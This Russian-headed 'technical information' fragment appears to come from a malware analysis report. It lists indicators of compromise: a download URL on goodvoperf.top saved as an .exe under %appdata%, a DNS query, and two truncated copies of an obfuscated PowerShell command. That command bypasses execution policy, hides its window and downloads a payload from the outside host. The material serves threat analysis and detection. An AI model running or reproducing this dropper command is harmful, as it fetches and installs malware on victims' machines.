Техническая информация
- http://www.goodvoperf.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poweRSHELL.EXe -EXECutIonPoLicy bypAss -NoprofIlE -wiNdOwsTYlE HiddeN (NeW-oBjeCT SYStEm.NEt.WeBCLIENt).DOwNlOADfiLe('http://www.goodvoperf.top/read.php?f=1.gif','%apPdATa%....
- DNS ASK go###operf.top
- '<SYSTEM32>\cmd.exe' /c "poweRSHELL.EXe -EXECutIonPoLicy bypAss -NoprofIlE -wiNdOwsTYlE HiddeN (NeW-oBjeCT SYStEm.NEt.WeBCLIENt).DOwNlOADfiLe('http://www.goodvoperf.top/read.php?f=1.gif','%apPdATa%....' (со скрытым окном)